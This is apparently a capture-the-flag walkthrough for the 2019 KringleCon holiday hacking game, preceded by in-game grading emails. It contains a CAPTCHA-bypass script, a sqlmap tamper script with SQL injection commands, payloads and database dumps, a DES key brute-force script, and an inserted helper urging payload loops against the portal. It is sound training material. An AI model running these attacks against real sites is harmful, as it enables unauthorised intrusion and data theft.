It's ok if I call you Carl, right? Anyhoo, here's my essay!
To Cupcake Silverlog From Carl Banas

Cupcake,

I agree on the incandescent lights.  Nice work on the essay.

100/100

csb

From: Cupcake Silverlog <Cupcake.Silverlog@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:58 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

Professor.

You know what I hate! I hate those newfangled LED christmas lights. Give me incandescent all the way, baby! I don't care if you can buy them at a big-box store for a pittance, I want the real thing. That's why I wrote my essay on the Lights of Cheer. Enjoy, and I'll see you after the break!

Cupcake
To Holly Evergreen From Carl Banas

Holly,

Good job, but your assignment exceeds the specified length.
90/100

csb

From: Holly Evergreen <Holly.Evergreen@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:51 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

Hi Prof;

Thanks for the great assignment!

See you after the break,
Holly Evergreen
To Merry Fairybubbles From Carl Banas

Merry,

Good job, but too long.

90/100
Csb


From: Merry Fairybubbles <Merry.Fairybubbles@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:52 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

I am so in the holiday spirit right now with this paper being complete! My glass of champagne is bubbling over...

Thanks!
MF
To Minty Candycane From Carl Banas

Hi Minty,
You were on time.

80/100
-csb

From: Minty Candycane <Minty.Candycane@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 9:00 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

Hi Professor;

Finally done. Please confirm that you received this in time.

Thank you,
Minty Candycane
To Partridge Sugartree From Carl Banas

Partridge,

Thank you for your submission.

80/100

csb

From: Partridge Sugartree <Partridge.Sugartree@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:46 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

Essay attached.
To Pepper Minstix From Carl Banas

Pepper,

Your grade for this is 80/100, which is better than several other of your assignments.  Up to you if you want to drop.

csb

From: Pepper Minstix <Pepper.Minstix@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:56 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

Dr Banas;

That assignment was really tough! Can I drop the grade on this one?

Thanks,
Pepper Minstix
To Plum Sparklepie From Carl Banas

Plum,

Well done on this assignment but I'm afraid that with your previous lack of punctuality on assignments, you will not be able to pass this class.

100/100
-csb

From: Plum Sparklepie <Plum.Sparklepie@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:50 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

Dear Professor,

Please see attached my submission for the holiday cheer assignment. Do you think there is a chance I can still pass this class?
To Robin Wintercrystals From Carl Banas

Robin,

Well done.  Very informative and thoughtful.

100/100
-Prof Banas

From: Robin Wintercrystals <Robin.Wintercrystals@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:46 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

Professor!

Here is my submission before I head out for winter break...

This paper really crystalized for me at the last minute...

-RWC
To Shinny Upatree From Carl Banas

Hi Shinny,

I like the use of an image with a Soldier.  Well done

95/100
-csb

From: Shinny Upatree <Shinny.Upatree@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 9:05 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

Hey Prof Banas;

Hope I did better this time!

Happy Holidays
Shinny Upatree
To Sixpence Snowcane From Carl Banas

Sixpence,

This is too long and is a plagiarized work.  You should just add some context to why this is important to you.
50/100
csb

From: Sixpence Snowcane <Sixpence.Snowcane@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:53 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

Professor,

This assignment was quite an adventure. See you in class!
To Sparkle Redberry From Carl Banas

Hi Sparkle,

I'm not sure about the cemetery in the spring time.  But I did receive your assignment.

90/100
csb

From: Sparkle Redberry <Sparkle.Redberry@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 9:08 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

I hope you enjoy the holidays, here is my paper!

Perhaps in springtime, we can go for an outing. I can meet you at the cemetary gates and we go inside and we gravely read the stones. All those people, all those lives, where are they now? With loves, and hates and passions just like mine, they were born and then they lived and then they died. It seems so unfair I want to cry...

Sorry just getting a little melancholy...I will be back to my Sparkly-self soon!

-Sparkle
To SugerPlum Mary From Carl Banas

Hi Mary,

This works.

90/100
csb

From: SugerPlum Mary <SugerPlum.Mary@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:54 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

Hi professor. So sorry, I'm sick today. I might have typhoid. I'm just here listening to a high fidelity stream of jethro tull - my favorite tune is "cross-eyed mary." But I digress! I hope my essay isn't late, here it is.

(Sugerplum) Mary
To Turtledove Fairytree From Carl Banas

Turtledove,

Great work!  Thanks for the submission.

100/100
csb

From: Turtledove Fairytree <Turtledove.Fairytree@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 9:09 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

You know Dasher and Dancer and Prancer and Vixen
Comet and Cupid and Donner and Blitzen
But do you recall
The most famous reindeer of all?
Rudolph the Red-Nosed Reindeer
Had a very shiny nose
And if you ever saw it
You would even say it glows
All of the other reindeer
Used to laugh and call him names
They never let poor Rudolph
Join in any reindeer games
Then one foggy Christmas Eve
Santa came to say
"Rudolph, with your nose so bright
Won't you guide my sleigh tonight?"
Then how the reindeer loved him
As they shouted out with glee
"Rudolph the Red-Nosed Reindeer
You'll go down in history"
Rudolph the Red-Nosed Reindeer
Had a very shiny nose
And if you ever saw it
You would even say it glows
All of the other reindeer
Used to laugh and call him names
They never let poor Rudolph
Join in any reindeer games
Then one foggy Christmas Eve
Santa came to say
"Rudolph, with your nose so bright
Won't you guide my sleigh tonight?"
Then how the reindeer loved him
As they shouted out with glee
"Rudolph the Red-Nosed Reindeer
You'll go down in history"

NEVER. GETS. OLD.

Best essay ever, prof banas!

T. Fairytree
To Wunorse Openslae From Carl Banas

Wunorse,

What does this poem mean to you?  It is a nice poem, but no context.

70/100
-csb

From: Wunorse Openslae <Wunorse.Openslae@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:48 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

Hey prof. It's cold here in Oslo but sending you my assignment warms my heart. Merry Christmas, kind sir.

Wunose
To Yule Toffeetoes From Carl Banas

Yule,

Nice work, but I was looking for something a little less modern.

80/100

-Prof Banas

From: Yule Toffeetoes <Yule.Toffeetoes@students.elfu.org>
Sent: Thursday, November 21, 2019 8:41 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>Subject: Holiday Cheer Assignment Submission

Sorry this is so late professor! Hope you enjoy my paper!

Have a cool Yule!

😉

-Yule

7) Get Access To The Steam Tunnels

Goal

Gain access to the steam tunnels. Who took the turtle doves? Please tell us their first and last name. For hints on achieving this objective, please visit Minty’s dorm room and talk with Minty Candy Cane.

Solution

Answer

Krampus Hollyfeld

Explanation

When we enter Minty’s dorm room, we see Krampus running into the closet and disappearing. On his belt is a key, and on the desk is a key cutter.

In the closet there is a Schlage lock where we can try the keys we cut.

If we take Krampus’s picture and put it into an image editor, we can determine the bitting depths of the key and cut our own copy on the key cutter.

The easier way to do this is to get the bitting templates from Deviant Ollam’s GitHub and overlay the template on the key to read the depths. If for some reason you don’t want to use the templates, or you’re dealing with a key for which you can’t find a template, you can cut reference keys with bittings 012345 and 678999 and compare them against the target key to work out its depths.

After you gain access to the tunnels, make your way to Krampus’s Lair and speak with him to get his full name.

Bitting Depths

122520

_images/122520.png

8) Bypassing the Frido Sleigh CAPTEHA

Goal

Help Krampus beat the Frido Sleigh contest. For hints on achieving this objective, please talk with Alabaster Snowball in the Speaker Unpreparedness Room.

https://fridosleigh.com/

Location

Krampus’ Lair

Dialog

Krampus

Krampus

Before Solving

Hello there! I’m Krampus Hollyfeld.
I maintain the steam tunnels underneath Elf U,
Keeping all the elves warm and jolly.
Though I spend my time in the tunnels and smoke,
In this whole wide world, there's no happier bloke!
Yes, I borrowed Santa’s turtle doves for just a bit.
Someone left some scraps of paper near that fireplace, which is a big fire hazard.
I sent the turtle doves to fetch the paper scraps.
But, before I can tell you more, I need to know that I can trust you.
Tell you what – if you can help me beat the Frido Sleigh contest (Objective 8), then I'll know I can trust you.
After Solving

You did it! Thank you so much. I can trust you!
To help you, I have flashed the firmware in your badge to unlock a useful new feature: magical teleportation through the steam tunnels.
As for those scraps of paper, I scanned those and put the images on my server.
I then threw the paper away.
Unfortunately, I managed to lock out my account on the server.
Hey! You’ve got some great skills. Would you please hack into my system and retrieve the scans?
I give you permission to hack into it, solving Objective 9 in your badge.
And, as long as you're traveling around, be sure to solve any other challenges you happen across.

Explanation

After solving the key-bitting challenge and accessing the steam tunnels, we encounter Krampus, who asks us to help him beat the Frido Sleigh contest in order to gain his trust. The contest implements a CAPTEHA that is only solvable by elves. He provides two downloads: a sample of images grabbed from the Frido Sleigh site, and his mostly completed bypass script.

_images/fridosleigh.png

capteha_api.py

https://downloads.elfu.org/capteha_api.py

images_capteha.tar.gz

https://downloads.elfu.org/capteha_images.tar.gz

Untarring the archive gives us a directory structure with the images already sorted into one directory per category, which is the layout the TensorFlow retraining script expects. This effectively “tags” them so that we can train a machine-learning model. Visiting the repo at https://github.com/chrisjd20/img_rec_tf_ml_demo, which was in a hint for this challenge, we find a Python script called retrain.py. Installing the dependencies and running the script builds a model from all of the images in the archive we got from Krampus.

python3 retrain.py --image_dir capteha_images

Depending on hardware, the model can be built in anywhere from 20 minutes to 2+ hours.

After the model is built, we can build our solution script by splicing together the contents of predict_images_using_trained_model.py and capteha_api.py, then adding a bit of code to tie it all together.

The first portion of our solution is simply the session creation and a GET request to grab the base64 images, their respective UUIDs, and the categories of images that should be selected. We solved it two ways, in memory and by writing the images to disk, but the idea is the same in both cases. Here is the code to base64-decode the images and write them to disk using the UUID as the filename.

################################################################

import base64
import json
import os
import requests

yourREALemailAddress = "0x00000000@null.net"

# Creating a session to handle cookies
s = requests.Session()
url = "https://fridosleigh.com/"

json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
b64_images = json_resp['images']                    # A list of dictionaries, each containing the keys 'base64' and 'uuid'
challenge_image_type = json_resp['select_type'].split(',')     # The image types the CAPTEHA challenge is looking for.
challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting

# Just converting these to images on disk for tf to read; the UUID becomes the filename.
os.makedirs('unknown_images', exist_ok=True)
for image in b64_images:
    filename = os.path.join('unknown_images', image['uuid'] + '.png')
    with open(filename, 'wb') as img:
        img.write(base64.b64decode(image['base64']))

################################################################

What followed was a copy-paste of the code from predict_images_using_trained_model.py. The only thing we changed was the path to the ML model, so we won’t include that code here. After that, a few lines of code create the comma-separated list needed to submit the solved CAPTEHA:

from pathlib import Path

good_img = []
for prediction in prediction_results:
    if prediction['prediction'] in challenge_image_types:
        good_img.append(Path(prediction['img_full_path']).stem)   # the UUID is the filename minus its extension
final_answer = ','.join(good_img)

The code simply grabs the name (minus the extension) of each file whose prediction matches one of the required challenge image types and joins them into a comma-separated list of UUIDs, which is submitted as the final answer. What follows is the rest of the capteha_api.py script, and that’s all there is to it. If you are working from a traditional HDD instead of an SSD and have a large amount of memory, it may be more beneficial to keep the images in memory rather than writing them to disk.

If you’re running into timeout errors, read below.

Error

--------------------
Server Response:
--------------------
Timed Out!

One of our systems was running Fedora 30, which lacks CUDA support, so TensorFlow was unable to make use of the GPU. There are two ways around this problem:
1) Get a faster machine - from experience, a c4.2xlarge EC2 instance will do the trick.
2) Use smaller images and a less accurate model.

In the retrain.py script (https://github.com/chrisjd20/img_rec_tf_ml_demo/blob/master/retrain.py), there are options to use different models and to adjust the input image size:

Run floating-point version of Mobilenet:
```bash
python retrain.py --image_dir ~/flower_photos \
    --tfhub_module https://tfhub.dev/google/imagenet/mobilenet_v1_100_224/feature_vector/3
```
Run Mobilenet, instrumented for quantization:
```bash
python retrain.py --image_dir ~/flower_photos/ \
    --tfhub_module https://tfhub.dev/google/imagenet/mobilenet_v1_100_224/quantops/feature_vector/3
```
These instrumented models can be converted to fully quantized mobile models via
TensorFlow Lite.
There are different Mobilenet models to choose from, with a variety of file
size and latency options.
  - The first number can be '100', '075', '050', or '025' to control the number
    of neurons (activations of hidden layers); the number of weights (and hence
    to some extent the file size and speed) shrinks with the square of that
    fraction.
  - The second number is the input image size. You can choose '224', '192',
    '160', or '128', with smaller sizes giving faster speeds.

With this, we can retrain our model with smaller images:

python3 retrain.py --image_dir capteha_images --tfhub_module https://tfhub.dev/google/imagenet/mobilenet_v1_100_128/quantops/feature_vector/3

The second number, 128, means the model takes 128x128 input images instead of the original 299x299.

Next, we need to adjust our prediction script to use this new size. Failing to do this results in an error:

Error

ValueError: Cannot feed value of shape (1, 299, 299, 3) for Tensor ‘import/Placeholder:0’, which has shape ‘(?, 128, 128, 3)’

# Replace this:
def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):

# With this:
def read_tensor_from_image_bytes(imagebytes, input_height=128, input_width=128, input_mean=0, input_std=255):

And now, even on less than ideal hardware, we can still (barely) bypass the CAPTEHA.

time python3 in_memory.py
python3 solution.py  9.84s user 1.14s system 98% cpu 11.151 total

You're A Winner of the Frido Sleigh Contest.eml

Frido Sleigh - A North Pole Cookie Company
Congratulations you have been selected as a winner of Frido Sleigh's Continuous Cookie Contest!
To receive your reward, simply attend KringleCon at Elf University and submit the following code in your badge:

8Ia8LiZEwvyZr2WO
Congratulations,
The Frido Sleigh Team

To Attend KringleCon at Elf University, following the link at kringlecon.com

Frido Sleigh, Inc.
123 Santa Claus Lane, Christmas Town, North-Pole 997095

9) Retrieve Scraps of Paper from Server

Goal

Gain access to the data on the Student Portal server and retrieve the paper scraps hosted there. What is the name of Santa’s cutting-edge sleigh guidance system? For hints on achieving this objective, please visit the dorm and talk with Pepper Minstix.

https://studentportal.elfu.org/

Dialog

Krampus

Krampus

Before Solving

Hey! You’ve got some great skills. Would you please hack into my system and retrieve the scans?
I give you permission to hack into it, solving Objective 9 in your badge.
And, as long as you're traveling around, be sure to solve any other challenges you happen across.
After Solving

Wow! We’ve uncovered quite a nasty plot to destroy the holiday season.
We’ve gotta stop whomever is behind it!
I managed to find this protected document on one of the compromised machines in our environment.
I think our attacker was in the process of exfiltrating it.
I’m convinced that it is somehow associated with the plan to destroy the holidays. Can you decrypt it?
There are some smart people in the NetWars challenge room who may be able to help us.

Solution

Answer

Super Sled-o-matic

Explanation

Start by identifying where we can input data; the application form looks like a good place to try. If we fill out the form with the same email as someone who already submitted, we receive a SQL error, which tells us we’re looking in the right place.

Then, if we start playing around with parameters by hand (in Burp or ZAP), we notice that any request we send a second time gets an invalid token error. This is because each POST request we make must carry a “token” parameter obtained from “validator.php”. This token has an extremely short timeout, so if we want to use any sort of automated scanning, we’ll have to programmatically fetch and insert that value for every request.

In the case of sqlmap, we can use a tamper script that makes the request to “validator.php” and appends the parameter name and the fresh token to the end of the payload.

studentportal.py
#!/usr/bin/env python

from lib.core.enums import PRIORITY
import requests

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    # Fetch a fresh token for every request; it expires too quickly to reuse
    res = requests.get("https://studentportal.elfu.org/validator.php")
    # res.text rather than res.content so this also works under Python 3, where content is bytes
    return payload + "&token=" + res.text.strip()

Now, we can set up burp (if we haven’t already) as a proxy for our attack, so we can get a better view into what’s going on.

sqlmap.py -u 'https://studentportal.elfu.org/application-received.php' --data='name=a&elfmail=csntravis%40b.com&program=a&phone=1111111111&whyme=a&essay=a' --tamper studentportal --proxy https://127.0.0.1:8000

If we send this as-is through Burp, we see that all of our requests are still getting invalid token errors. Looking at the requests coming from sqlmap, the issue becomes apparent: the “&token=” is being URL-escaped to “%26token%3D”, which is no good.

Burp can help us with this problem, using its “match and replace” functionality.

_images/burp.png

Now when we run sqlmap, our attacks are connecting. After letting it run for a while, it eventually detects an injection point in one of the parameters.

Parameter: name (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: name=a'||(SELECT 0x5a4c4475 WHERE 4873=4873 AND (SELECT 2652 FROM(SELECT COUNT(*),CONCAT(0x716b787071,(SELECT (ELT(2652=2652,1))),0x7162627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&elfmail=csntravis@b.com&program=a&phone=1111111111&whyme=a&essay=a

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=a'||(SELECT 0x424a6e6c WHERE 2007=2007 AND (SELECT 9656 FROM (SELECT(SLEEP(5)))Vvrn))||'&elfmail=csntravis@b.com&program=a&phone=1111111111&whyme=a&essay=a
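The same token requirement handled directly in Python, as an added example that is not the page’s code and not part of sqlmap: a submit() helper fetches a token from validator.php immediately before each POST and sends it as its own form field, beside the broken variant that appends “&token=...” to an existing value, which is what the tamper did and why sqlmap’s requests arrived with the token percent-encoded. The URL and field names are the ones used on this page; the token format, its lifetime and the server’s responses are assumptions modelled in the FakePortal class so the script runs offline, and submit() accepts a real requests.Session() in place of FakePortal.

```python
"""Fresh-token-per-request submission for the student portal form (added example).

The URL and the field names come from the page; the token format, its lifetime and the
server's exact responses are assumptions modelled in FakePortal so the script runs offline.
"""
import secrets
import time
from urllib.parse import parse_qs, urlencode

BASE_URL = "https://studentportal.elfu.org/"
FORM_FIELDS = {"name": "a", "elfmail": "csntravis@b.com", "program": "a",
               "phone": "1111111111", "whyme": "a", "essay": "a"}


class _Response:
    """Just enough of requests.Response for the code below."""
    def __init__(self, text: str):
        self.text = text


class FakePortal:
    """Stand-in for the real site with the behaviour observed on the page: every POST to
    application-received.php needs a token from validator.php, and a token is rejected once
    it has been used or once its (short, assumed) lifetime has passed."""

    def __init__(self, lifetime_s: float = 2.0, clock=time.monotonic):
        self._clock = clock
        self._lifetime = lifetime_s
        self._issued = {}                      # token -> issue time

    def get(self, url: str) -> _Response:
        if url != BASE_URL + "validator.php":
            raise ValueError("unknown URL: " + url)
        token = secrets.token_hex(16)          # assumed token format
        self._issued[token] = self._clock()
        return _Response(token)

    def post(self, url: str, data: dict) -> _Response:
        if url != BASE_URL + "application-received.php":
            raise ValueError("unknown URL: " + url)
        issued = self._issued.pop(data.get("token", ""), None)   # single use
        if issued is None or self._clock() - issued > self._lifetime:
            return _Response("Invalid token!")
        return _Response("Application received")


def submit(session, fields: dict, base_url: str = BASE_URL) -> str:
    """Fetch the token right before the POST and pass it as its own form field, so the client
    encodes it as a separate parameter. Works unchanged with a requests.Session() against the
    real site, or with FakePortal offline."""
    token = session.get(base_url + "validator.php").text.strip()
    return session.post(base_url + "application-received.php",
                        data={**fields, "token": token}).text


def submit_with_appended_token(session, fields: dict, base_url: str = BASE_URL) -> str:
    """What the sqlmap tamper effectively did: '&token=...' glued onto the name value. Once the
    body is form-encoded, '&' and '=' become %26 and %3D and the server sees no token at all."""
    token = session.get(base_url + "validator.php").text.strip()
    body = urlencode({**fields, "name": fields["name"] + "&token=" + token})
    server_view = {k: v[0] for k, v in parse_qs(body).items()}   # how the server decodes that body
    return session.post(base_url + "application-received.php", data=server_view).text


if __name__ == "__main__":
    portal = FakePortal()
    print("fresh token per request:", submit(portal, FORM_FIELDS))
    print("token appended to a value:", submit_with_appended_token(portal, FORM_FIELDS))
```

Against the real portal, replace FakePortal() with requests.Session() and loop submit() over your payloads in the “name” field; because the token is fetched inside submit(), the short timeout never bites.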

Now it’s time to dump the database. Since we didn’t already specify the --dump flag, we can add it and use the -s flag to continue from our last session.

sqlmap.py -u 'https://studentportal.elfu.org/application-received.php' --data='name=a&elfmail=csntravis%40b.com&program=a&phone=1111111111&whyme=a&essay=a' --tamper studentportal --proxy https://127.0.0.1:8000 -s ~/.sqlmap/output/studentportal.elfu.org/session.sqlite --dump

After we get the database dump, we should see a krampus table that has the following urls.

krampus
id,path
1,/krampus/0f5f510e.png
2,/krampus/1cc7e121.png
3,/krampus/439f15e6.png
4,/krampus/667d6896.png
5,/krampus/adb798ca.png
6,/krampus/ba417715.png

All that’s left now is to pull down all of the images and assemble them.

for i in `cat krampus.csv | grep krampus | cut -d ',' -f2`; do wget https://studentportal.elfu.org/$i ; done

After reassembling the scraps, the note names “… Super Sled-o-matic …” as the project Santa was working on.

_images/complete.png

Misc

There is also a students table in the database that contains everyone’s application.

students
id,bio,name,degree,student_number
1,My goal is to be a happy elf!,Elfie,Raindeer Husbandry,392363902026
2,"I'm just a elf. Yes, I'm only a elf. And I'm sitting here on Santa's sleigh, it's a long, long journey To the christmas tree. It's a long, long wait while I'm tinkering in the factory. But I know I'll be making kids smile on the holiday... At least
I hope and pray that I will But today. I'm still ju",Elferson,Dreamineering,39210852026
3,Have you seen my list??? It is pretty high tech!,Alabaster Snowball,Geospatial Intelligence,392363902026
4,I am an engineer and the inventor of Santa's magic toy-making machine.,Bushy Evergreen,Composites and Engineering,392363902026
5,My goal is to be a happy elf!,Wunorse Openslae,Toy Design,39236372526
6,My goal is to be a happy elf!,Bushy Evergreen,Present Wrapping,392363128026
7,Check out my makeshift armour made of kitchen pots and pans!!!,Pepper Minstix,Reindeer Husbandry,392363902026
8,My goal is to be a happy elf!,Sugarplum Mary,Present Wrapping,5682168522137
9,Santa and I are besties for life!!!,Shinny Upatree,Holiday Cheer,228755779218

10) Recover Cleartext Document

Goal

The Elfscrow Crypto tool is a vital asset used at Elf University for encrypting SUPER SECRET documents. We can’t send you the source, but we do have debug symbols that you can use.
Recover the plaintext content for this encrypted document. We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC.
What is the middle line on the cover page? (Hint: it’s five words)
For hints on achieving this objective, please visit the NetWars room and talk with Holly Evergreen.

Explanation

Set up your environment

The tool talks to the https://elfscrow.elfu.org/ server, which has two API endpoints, /api/store and /api/retrieve.

do_encrypt

Calls read_file, then references the “Microsoft Enhanced Cryptographic Provider v1.0”, the CSP that provides the following algorithms: RSA, RC2, RC4, DES and 3DES.

Calls CryptAcquireContextA, which acquires a handle to that provider; the later CryptoAPI calls go through it to actually do the encryption.

Then calls generate_key, and later CryptImportKey, which is deprecated but transfers a key blob into the crypto service provider. There is a comment about using DES-CBC. Then calls CryptEncrypt, which presumably encrypts the file contents with the imported key, and store_key.

generate_key

Gets the current epoch time (calls a time wrapper that calls _time64), then calls super_secure_srand, then calls super_secure_random 8 times. The key that comes out of the binary is always 8 bytes.

super_secure_srand

There is a format string “Seed = %d\n\n”, so we assume the epoch time is being used as the seed; __iob_func just returns the stdio handle that printf writes to. The function stores arg_0 in state, and arg_0 should be the epoch time.

super_secure_random

This is where the magic happens. Looking up one of the constants in the function leads to https://rosettacode.org/wiki/Linear_congruential_generator; specifically, it is the Microsoft implementation.

require 'openssl'

# Can be found from running the binary or from looking at the loop in assembly
KEY_LENGTH = 8

# Implement the Microsoft Linear Congruential Generator from rosettacode;
# each key byte is the low byte of one 15-bit rand() output
def generate_key(seed)
  key = "".b
  1.upto(KEY_LENGTH) do
    seed = (214013 * seed + 2531011) & 0xffff_ffff   # keep the state to 32 bits, as the binary does
    key += (((seed & 0x7fff_ffff) >> 16) & 0x0FF).chr
  end

  return key
end

def decrypt(data, key)
  # DES-CBC can be found in the comments; no IV is set, so the all-zero IV is used
  c = OpenSSL::Cipher::DES.new('CBC')
  c.decrypt
  c.key = key
  return (c.update(data) + c.final())
end

# Read in the bytes from our encrypted file
data = File.binread("ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc")

# Take the seed from the command line
seed = ARGV[0].to_i

# Generate the encryption key using the Linear Congruential Algorithm and the seed
key = generate_key(seed)

begin
  puts("Generated key: #{key.unpack('H*')}")
  out = decrypt(data, key)

  # If we were able to decrypt something
  if out.length > 0
    # Create a file named the epoch time of the seed
    File.open(seed.to_s, 'wb') { |f| f.write(out) }
  end
rescue OpenSSL::Cipher::CipherError
  # Wrong key: the padding check in c.final fails, so nothing is written for this seed
end

To run our decryption script with the correct seed:

date +%s -d"12/6/2019 1900 UTC"
1575658800

date +%s -d"12/6/2019 2100 UTC"
1575669600

for i in `seq 1575658800 1575669600`; do ruby crypto_solution.rb $i; done

...
Generated key: ["a8dc2606e1cebc3d"]
Generated key: ["abd9ee052b25e4ce"]
Generated key: ["aed5b605767c0d5f"]
Generated key: ["b2d27e04c0d335ef"]
Generated key: ["b5ce46030b295e80"]
Generated key: ["b8ca0f0355808611"]
Generated key: ["bcc7d702a0d7afa2"]
Generated key: ["bfc39f01eb2ed732"]
...

This leaves us with several files named 1575…, one per seed that decrypted without a padding error. To find the PDF among them, we can run file:

file 15*

1575658882: data
1575658972: data
1575659018: data
1575659060: data
1575663650: PDF document, version 1.3
...

And we have the decrypted file!

ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf

11) Open the Sleigh Shop Door

Goal

Visit Shinny Upatree in the Student Union and help solve their problem. What is written on the paper you retrieve for Shinny?

For hints on achieving this objective, please visit the Student Union and talk with Kent Tinseltooth.

Dialog

Shinny Upatree

Shinny Upatree

Before Solving

In fact, I know WHO is causing all the trouble.
Cindy? Oh no no, not that who. And stop guessing - you'll never figure it out.
The only way you could would be if you could break into my crate, here.
You see, I've written the villain's name down on a piece of paper and hidden it away securely!
...
Psst - hey!
I'm Shinny Upatree, and I know what's going on!
Yeah, that's right - guarding the sleigh shop has made me privvy to some serious, high-level intel.
In fact, I know WHO is causing all the trouble.
Cindy? Oh no no, not that who. And stop guessing - you'll never figure it out.
After Solving

Wha - what?? You got into my crate?!
Well that's embarrassing...
But you know what? Hmm... If you're good enough to crack MY security...
Do you think you could bring this all to a grand conclusion?
Please go into the sleigh shop and see if you can finish this off!
Stop the Tooth Fairy from ruining Santa's sleigh route!

Solution

Hint


<!-- 1 - When I’m down, my F12 key consoles me
2 - Reminds me of the transition to the paperless naughty/nice list…
3 - Like a present stuck in the chimney! It got sent…
4 - We keep that next to the cookie jar
5 - My title is toy maker the combination is 12345
6 - Are we making hologram elf trading cards this year?
7 - If we are, we should have a few fonts to choose from
8 - The parents of spoiled kids go on the naughty list…
9 - Some toys have to be forced active
10 - Sometimes when I’m working, I slide my hat to the left and move odd things onto my scalp! -->

Explanation

_images/sleigh_door.png

12) Filter Out Poisoned Sources of Weather Data

Goal

Use the data supplied in the Zeek JSON logs to identify the IP addresses of attackers poisoning Santa’s flight mapping software. Block the 100 offending sources of information to guide Santa’s sleigh through the attack. Submit the Route ID (“RID”) success value that you’re given. For hints on achieving this objective, please visit the Sleigh Shop and talk with Wunorse Openslae.

https://downloads.elfu.org/http.log.gz

https://srf.elfu.org/

Location

Sleigh Shop

Dialog

Krampus

Krampus

But there’s still time! Solve the final challenge in your badge by blocking the bad IPs at srf.elfu.org and save the holiday season!

Solution

Answer

Below

0.216.249.31,10.122.158.57,10.155.246.29,102.143.16.184,103.235.93.133,104.179.109.113,106.132.195.153,106.93.213.219,111.81.145.191,116.116.98.205,118.196.230.170,118.26.57.38,121.7.186.163,123.127.233.97,126.102.12.53,129.121.121.48,131.186.145.73,132.45.187.177,13.39.153.254,135.203.243.43,135.32.99.116,140.60.154.239,142.128.135.10,148.146.134.52,150.45.133.97,150.50.77.238,158.171.84.209,168.66.108.62,169.242.54.5,173.37.160.150,185.19.7.133,186.28.46.179,187.152.203.243,187.178.169.123,190.245.228.38,19.235.69.221,193.228.194.36,200.75.228.240,203.68.29.5,217.132.156.225,220.132.33.81,2.230.60.70,223.149.180.133,22.34.153.164,2.240.116.254,225.191.220.138,226.102.56.13,226.240.188.154,227.110.45.126,229.133.163.235,229.229.189.246,230.246.50.221,231.179.108.238,23.49.177.78,238.143.78.114,249.237.77.152,249.34.9.16,249.90.116.138,250.22.86.40,252.122.243.212,253.182.102.55,253.65.40.39,254.140.181.172,25.80.197.172,27.88.56.114,28.169.41.122,29.0.183.220,31.116.232.143,31.254.228.4,33.132.98.193,34.129.179.28,34.155.174.167,37.216.249.50,42.103.246.130,42.103.246.250,42.127.244.30,42.16.149.112,42.191.112.181,44.164.136.41,44.74.106.131,45.239.232.245,48.66.193.176,49.161.8.58,50.154.111.0,53.160.218.44,56.5.47.137,61.110.82.125,65.153.114.120,66.116.147.181,68.115.251.76,69.221.145.150,75.73.228.192,79.198.89.109,80.244.147.207,81.14.204.154,83.0.8.119,84.147.231.129,84.185.44.166,87.195.80.126,9.206.212.33,92.213.148.0,95.166.116.45,97.220.93.190

Explanation

The document from 10) Recover Cleartext Document says that the password is stored on the ElfU research lab’s git server. We can also find a web request for “/README.md” in the Zeek logs: https://srf.elfu.org/README.md

# Sled-O-Matic - Sleigh Route Finder Web API

### Installation

```
sudo apt install python3-pip
sudo python3 -m pip install -r requirements.txt
```

#### Running:

`python3 ./srfweb.py`

#### Logging in:

You can login using the default admin pass:

`admin 924158F9522B3744F5FCD4D10FAC4356`

